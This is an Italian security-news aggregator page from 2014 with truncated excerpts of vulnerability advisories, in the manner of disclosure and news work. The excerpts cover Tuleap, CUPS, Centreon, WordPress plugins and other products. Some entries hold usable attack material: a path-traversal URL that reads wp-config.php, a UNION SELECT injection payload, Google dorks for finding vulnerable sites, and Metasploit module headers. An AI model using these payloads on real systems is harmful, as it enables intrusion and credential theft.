NuevoLabs flash player for clipshare SQL Injection

29 ottobre 2014 - Fonte: http://www.mondounix.com
Nuevolabs Nuevoplayer for clipshare SQL Injection
=======================================================================
 
:: ADVISORY SUMMARY ::
Title:     Nuevolabs Nuevoplayer for clipshare Sql Injection
Vendor:    NUEVOLABS (www.nuevolabs.com)
Product:   NUEVOPLAYER for clipshare
Credits:   Cory Marsh - protectlogic.com
Discovery: 2014-10-10
Release:   2014-10-28
 
Nueovplayer is a popular flash video player with integration into multiple popular video sharing suites.  The most 
notable is Clipshare (clip-share.com).  Nuevoplayer provides flash video playing capabilities to third party video 
sharing suites.
 
 
:: VULNERABILITY ::
Type:     SQL Injection and Privilege Escalation
Category: Remote
Severity:...

Leggi il seguito »

Tuleap 7.4.99.5 Remote Command Execution

29 ottobre 2014 - Fonte: http://www.mondounix.com
Vulnerability title: Tuleap <= 7.4.99.5 Remote Command Execution in Enalean Tuleap
CVE: CVE-2014-7178
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
Tuleap does not validate the syntax of the requests submitted to SVN handler pages in order to validate weather request passed to passthru() function are introducing any extra parameters that would be executed in the content of the application.
 
This vulnerability can be exploited by external attackers to introduce external commands into the workflow of the application that would execute them as shown on the attached Proof Of Concept code below.
 
After registering with the application...

Leggi il seguito »

Tuleap 7.2 XXE Injection

29 ottobre 2014 - Fonte: http://www.mondounix.com
Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap
CVE: CVE-2014-7177
Vendor: Enalean
Product: Tuleap
Affected version: 7.2 and earlier
Fixed version: 7.4.99.5
Reported by: Jerzy Kramarz
 
Details:
 
A multiple XML External Entity Injection has been found and confirmed within the software as an authenticated user. Successful attack could allow an authenticated attacker to access local system files. The following example vectors can be used as PoC to confirm the vulnerability.
 
Vulnerability 1:
 
1) Upload a XXE using the following request:
 
 
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
Host: [ip]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0)...

Leggi il seguito »

Tuleap 7.4.99.5 Blind SQL Injection

29 ottobre 2014 - Fonte: http://www.mondounix.com
Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
CVE: CVE-2014-7176
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injections:
 
 
GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
Host: 192.168.56.108
User-Agent:...

Leggi il seguito »

CUPS Filter Bash Environment Variable Code Injection

28 ottobre 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
  Rank = GoodRanking
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'CUPS Filter Bash Environment Variable Code Injection',
      'Description' => %q{
        This module exploits a post-auth code injection in specially crafted
        environment variables in Bash, specifically targeting CUPS filters
        through the PRINTER_INFO and PRINTER_LOCATION variables by default.
      },
      'Author' => [
        'Stephane Chazelas',...

Leggi il seguito »

Nuovo exploit per i dispositivi Samsung permette il controllo remoto del dispositivo

28 ottobre 2014 - Fonte: http://www.techzilla.it
samsung-galaxy-s5

Se abbiamo un dispositivo Samsung e utilizziamo la funzionalità “Find My Mobile” ( Trova Telefono ) forse sarebbe il caso di disabilitarlo momentaneamente. L’allarme arriva sia dal NIST (National Institute of Standards and Technology) che dal ricercatore Mohamed Baset che avvisano di un exploit  che permette di bloccare, far squillare o cancellare da remoto il contenuto di un dispositivo Samsung.

A quanto pare l’applicazione non controllerebbe le informazioni sul codice di blocco che riceve e un malintenzionato può inviare traffico dati per prendere...

Leggi il seguito »

WordPress Download Manager Arbitrary File Download

28 ottobre 2014 - Fonte: http://www.mondounix.com
# WordPress Download Manager Plugin - Arbitrary File Download
# CWE: CWE-98
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 25/10/2014
# Vendor Homepage: https://wordpress.org/plugins/download-manager/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: inurl:/plugins/download-manager/
 
# VUL: /views/file_download.php?fname=
 
 or:
 
 /file_download.php?fname=
 
# PoC : 
 
 http://WEBSITE/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php
 
 
# Xploit: Find one website with use /plugins/download-manager/ && ADD TO Link:/views/file_download.php?fname=../../wp-config.php

(12)

...

Leggi il seguito »

WordPress HTML5 / Flash Player SQL Injection

28 ottobre 2014 - Fonte: http://www.mondounix.com
# WordPress HTML5 and FLash PLayer Plugin SQL Injection
# CWE: CWE-89
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 24/10/2014
# Vendor Homepage: https://wordpress.org/plugins/player/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: inurl: "Index of" +inurl:/wp-content/plugins/player/
 
# PoC : 
 
http://WEBSITE/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,table_name,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from information_schema.tables where table_schema=database()--
 
 
# Xploit: Are vulnerable sites that have...

Leggi il seguito »

Dell SonicWall GMS v7.2.x – Persistent Web Vulnerability

24 ottobre 2014 - Fonte: http://www.mondounix.com
Document Title:
===============
Dell SonicWall GMS v7.2.x - Persistent Web Vulnerability
 
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1222
 
Release Date:
=============
2014-10-21
 
Vulnerability Laboratory ID (VL-ID):
====================================
1222
 
Common Vulnerability Scoring System:
====================================
3
 
Product & Service Introduction:
===============================
Dell SonicWALL`s management and reporting solutions provide a comprehensive architecture for centrally creating and managing security policies, providing real-time monitoring and alerts, and delivering intuitive compliance and usage reports, all from...

Leggi il seguito »

Centreon SQL / Command Injection

24 ottobre 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Centreon SQL and Command Injection',
      'Description'    => %q{
        This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon
        Enterprise Server 2.2 and prior. Due to a combination of SQL injection and command
        injection in the displayServiceStatus.php component, it is possible to execute arbitrary
 ...

Leggi il seguito »